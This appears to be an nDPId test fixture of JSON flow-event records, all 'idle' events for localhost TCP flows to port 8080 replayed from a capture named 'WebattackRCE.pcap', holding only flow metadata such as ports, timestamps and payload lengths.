+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
